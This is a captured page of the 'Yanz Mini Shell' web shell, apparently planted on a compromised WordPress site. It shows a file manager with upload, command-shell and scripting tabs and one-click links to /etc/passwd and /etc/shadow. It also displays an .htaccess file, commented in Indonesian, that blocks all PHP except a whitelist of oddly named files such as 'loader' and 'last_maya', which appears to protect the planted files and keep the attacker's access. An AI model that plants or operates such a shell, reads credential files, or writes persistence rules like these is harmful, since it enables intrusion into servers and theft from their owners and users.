Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
buyherba
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
# 1. Blokir akses ke file PHP secara umum <Files *.ph*> Order Deny,Allow Deny from all </Files> <Files *.Ph*> Order Deny,Allow Deny from all </Files> <Files *.pH*> Order Deny,Allow Deny from all </Files> # 2. Pengecualian khusus folder Asset WordPress (Theme & Plugin) <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^wp-(content|includes)/.*$ - [L] </IfModule> # 3. Whitelist file berdasarkan pola nama file yang sudah ditentukan <FilesMatch "^(last_maya|loader|v3|mvi1|validation|template|template-amp|sz)\.(php|html|js|css|txt|json|xml|jpg|jpeg|png|gif|svg|webp|woff|woff2|ttf|otf)$"> Order Allow,Deny Allow from all </FilesMatch> # 4. Izinkan folder wp-admin secara fungsional <Files wp-login.php> Allow from all </Files> # 5. Standar WordPress Permalink (Agar Page/Post tidak 404) <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> ErrorDocument 403 /index.php
Free Space : 1631394275328 Byte